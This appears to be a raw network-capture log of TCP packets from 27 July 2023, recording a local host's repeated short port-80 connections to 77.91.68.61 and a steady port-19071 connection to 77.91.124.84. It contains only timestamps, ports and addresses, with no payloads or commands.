Jul 27, 2023 01:34:29.882520914 CEST	50049	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.883436918 CEST	50050	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.927175045 CEST	80	50049	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.927810907 CEST	80	50050	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.927907944 CEST	50049	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.927963972 CEST	50050	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.936180115 CEST	50050	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.943450928 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:29.980777025 CEST	80	50050	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.984077930 CEST	80	50050	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:29.984211922 CEST	50050	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:29.988840103 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:30.019531012 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:30.075942039 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:30.093070984 CEST	50050	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.094386101 CEST	50051	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.099725008 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:30.138984919 CEST	80	50051	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.139036894 CEST	80	50050	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.139188051 CEST	50050	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.139261961 CEST	50051	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.145085096 CEST	50051	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.145750999 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:30.189038038 CEST	80	50051	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.192879915 CEST	80	50051	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.192936897 CEST	50051	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.201530933 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:30.355285883 CEST	50051	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.355999947 CEST	50052	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.399451971 CEST	80	50051	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.400926113 CEST	80	50052	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.401094913 CEST	50051	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.401132107 CEST	50052	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.573605061 CEST	50052	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.618381023 CEST	80	50052	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.622680902 CEST	80	50052	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.622772932 CEST	50052	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.808108091 CEST	50052	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.853128910 CEST	80	50052	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.853271008 CEST	50052	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.857391119 CEST	50053	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.901602030 CEST	80	50053	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.901709080 CEST	50053	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.912329912 CEST	50053	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:30.956311941 CEST	80	50053	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.961447954 CEST	80	50053	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:30.961569071 CEST	50053	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.190871000 CEST	50053	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.191764116 CEST	50054	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.235105991 CEST	80	50053	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:31.235204935 CEST	50053	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.235938072 CEST	80	50054	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:31.236028910 CEST	50054	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.338471889 CEST	50054	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.382631063 CEST	80	50054	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:31.387111902 CEST	80	50054	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:31.387243032 CEST	50054	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.632719040 CEST	50054	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.633456945 CEST	50055	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.677330971 CEST	80	50054	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:31.677450895 CEST	50054	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.677721024 CEST	80	50055	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:31.677818060 CEST	50055	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.682132006 CEST	50055	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:31.726608992 CEST	80	50055	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:31.731987953 CEST	80	50055	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:31.732153893 CEST	50055	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:32.603517056 CEST	50055	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:32.604676962 CEST	50056	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:32.648103952 CEST	80	50055	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:32.648189068 CEST	50055	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:32.648988008 CEST	80	50056	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:32.649099112 CEST	50056	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:32.667866945 CEST	50056	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:32.712258101 CEST	80	50056	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:32.716526031 CEST	80	50056	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:32.716617107 CEST	50056	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:33.828895092 CEST	50056	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:33.829636097 CEST	50057	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:33.873558044 CEST	80	50056	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:33.873632908 CEST	80	50057	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:33.873737097 CEST	50056	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:33.873792887 CEST	50057	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:33.877027988 CEST	50057	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:33.921260118 CEST	80	50057	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:33.925394058 CEST	80	50057	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:33.925548077 CEST	50057	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.116970062 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:34.162648916 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:34.245258093 CEST	50057	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.246090889 CEST	50058	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.264393091 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:34.289629936 CEST	80	50057	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.289854050 CEST	50057	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.290335894 CEST	80	50058	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.290518999 CEST	50058	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.325707912 CEST	50058	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.370177031 CEST	80	50058	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.374025106 CEST	80	50058	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.374109983 CEST	50058	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.486541033 CEST	50058	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.490025997 CEST	50059	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.492778063 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:34.531002045 CEST	80	50058	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.531061888 CEST	50058	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.534296989 CEST	80	50059	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.534375906 CEST	50059	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.534774065 CEST	50059	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.537652016 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:34.540610075 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:34.579015970 CEST	80	50059	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.582444906 CEST	80	50059	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.582545996 CEST	50059	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.655036926 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:34.687680960 CEST	50059	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.688353062 CEST	50060	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.732213020 CEST	80	50059	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.732275009 CEST	80	50060	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.732337952 CEST	50059	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.732393980 CEST	50060	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.733973026 CEST	50060	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.777816057 CEST	80	50060	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.782747984 CEST	80	50060	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.782828093 CEST	50060	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.807166100 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:34.852524042 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:34.891846895 CEST	50061	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.891942978 CEST	50060	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.936239004 CEST	80	50060	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.936333895 CEST	50060	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.936497927 CEST	80	50061	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.936590910 CEST	50061	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.940650940 CEST	50061	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.948256016 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:34.985163927 CEST	80	50061	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.988254070 CEST	80	50061	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:34.988393068 CEST	50061	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:34.993555069 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:34.998039007 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:35.043077946 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:35.085139990 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:35.095289946 CEST	50061	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.101088047 CEST	50062	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.130582094 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:35.139828920 CEST	80	50061	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.139971018 CEST	50061	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.145710945 CEST	80	50062	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.145932913 CEST	50062	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.146557093 CEST	50062	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.191107035 CEST	80	50062	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.195579052 CEST	80	50062	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.195672035 CEST	50062	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.264497042 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:35.314428091 CEST	50062	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.316258907 CEST	50063	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.360361099 CEST	80	50062	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.360590935 CEST	50062	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.361078024 CEST	80	50063	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.361289024 CEST	50063	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.395687103 CEST	50063	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.400300026 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:35.440499067 CEST	80	50063	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.444358110 CEST	80	50063	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.444495916 CEST	50063	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.445616007 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:35.446379900 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:35.491708994 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:35.492862940 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:35.538645029 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:35.546489954 CEST	50063	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.547168016 CEST	50064	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.591314077 CEST	80	50063	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.591411114 CEST	50063	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.591707945 CEST	80	50064	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.591798067 CEST	50064	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.594774961 CEST	50064	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.639550924 CEST	80	50064	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.643346071 CEST	80	50064	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.644970894 CEST	50064	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.750534058 CEST	50064	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.751380920 CEST	50065	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.764751911 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:35.796513081 CEST	80	50064	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.796624899 CEST	50064	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.797297955 CEST	80	50065	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.797466993 CEST	50065	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.798310041 CEST	50065	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.844099998 CEST	80	50065	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.847604036 CEST	80	50065	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:35.847716093 CEST	50065	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.956280947 CEST	50065	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:35.959973097 CEST	50066	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.000708103 CEST	80	50065	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.000987053 CEST	50065	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.004414082 CEST	80	50066	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.008125067 CEST	50066	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.015176058 CEST	50066	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.059905052 CEST	80	50066	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.064477921 CEST	80	50066	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.065231085 CEST	50066	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.172096968 CEST	50066	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.173568964 CEST	50067	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.217179060 CEST	80	50066	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.218015909 CEST	50066	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.218492031 CEST	80	50067	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.218760967 CEST	50067	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.236660957 CEST	50067	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.281507969 CEST	80	50067	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.286286116 CEST	80	50067	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.286411047 CEST	50067	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.412064075 CEST	50067	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.433891058 CEST	50068	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.457222939 CEST	80	50067	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.457319021 CEST	50067	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.479317904 CEST	80	50068	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.483931065 CEST	50068	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.484848976 CEST	50068	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.489275932 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:36.529633045 CEST	80	50068	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.534332037 CEST	80	50068	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.534411907 CEST	50068	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.665189981 CEST	50068	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.666018963 CEST	50069	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.710325003 CEST	80	50068	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.710783958 CEST	80	50069	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.710819006 CEST	50068	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.710900068 CEST	50069	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.711282969 CEST	50069	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.756006002 CEST	80	50069	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.759227991 CEST	80	50069	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.759324074 CEST	50069	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.874902964 CEST	50069	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.875631094 CEST	50070	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.919548988 CEST	80	50070	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.919612885 CEST	80	50069	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.919697046 CEST	50070	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.919728041 CEST	50069	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.920118093 CEST	50070	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.964226007 CEST	80	50070	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.968127966 CEST	80	50070	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:36.968302011 CEST	50070	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:36.999572039 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:37.044882059 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:37.045862913 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:37.077693939 CEST	50070	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.081300020 CEST	50071	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.090789080 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:37.091804028 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:37.121896982 CEST	80	50070	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.122005939 CEST	50070	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.126209974 CEST	80	50071	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.127744913 CEST	50071	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.129117966 CEST	50071	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.143979073 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:37.173842907 CEST	80	50071	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.177757978 CEST	80	50071	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.179711103 CEST	50071	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.264625072 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:37.287587881 CEST	50071	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.288229942 CEST	50072	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.332568884 CEST	80	50071	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.332634926 CEST	80	50072	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.332690001 CEST	50071	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.332762003 CEST	50072	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.333655119 CEST	50072	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.378263950 CEST	80	50072	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.382258892 CEST	80	50072	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.384840012 CEST	50072	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.499717951 CEST	50072	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.500380039 CEST	50073	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.518124104 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:37.544318914 CEST	80	50072	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.544394970 CEST	50072	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.544549942 CEST	80	50073	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.544641018 CEST	50073	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.545041084 CEST	50073	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.589031935 CEST	80	50073	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.593189001 CEST	80	50073	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.593313932 CEST	50073	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.703212023 CEST	50073	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.703931093 CEST	50074	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.747632980 CEST	80	50073	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.748450041 CEST	50073	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.748903990 CEST	80	50074	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.749243975 CEST	50074	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.752238989 CEST	50074	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.797118902 CEST	80	50074	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.800489902 CEST	80	50074	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.800576925 CEST	50074	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.909632921 CEST	50074	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.910319090 CEST	50075	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.954731941 CEST	80	50074	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.954775095 CEST	80	50075	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:37.954829931 CEST	50074	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.954883099 CEST	50075	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:37.956454039 CEST	50075	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.001499891 CEST	80	50075	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.005697966 CEST	80	50075	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.005872965 CEST	50075	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.140088081 CEST	50075	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.141005993 CEST	50076	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.185343027 CEST	80	50075	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.186875105 CEST	50075	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.187216043 CEST	80	50076	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.187361956 CEST	50076	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.190258980 CEST	50076	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.235667944 CEST	80	50076	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.240211010 CEST	80	50076	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.240700960 CEST	50076	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.348120928 CEST	50076	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.356400013 CEST	50077	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.393127918 CEST	80	50076	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.393237114 CEST	50076	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.401251078 CEST	80	50077	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.401403904 CEST	50077	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.401947021 CEST	50077	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.446722984 CEST	80	50077	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.450817108 CEST	80	50077	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.454173088 CEST	50077	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.610768080 CEST	50077	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.611546993 CEST	50078	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.655587912 CEST	80	50077	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.655697107 CEST	50077	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.655817032 CEST	80	50078	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.655899048 CEST	50078	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.656409025 CEST	50078	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.701028109 CEST	80	50078	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.704396009 CEST	80	50078	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.704509974 CEST	50078	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.824400902 CEST	50078	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.825372934 CEST	50079	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.869081020 CEST	80	50078	77.91.68.61	192.168.2.5
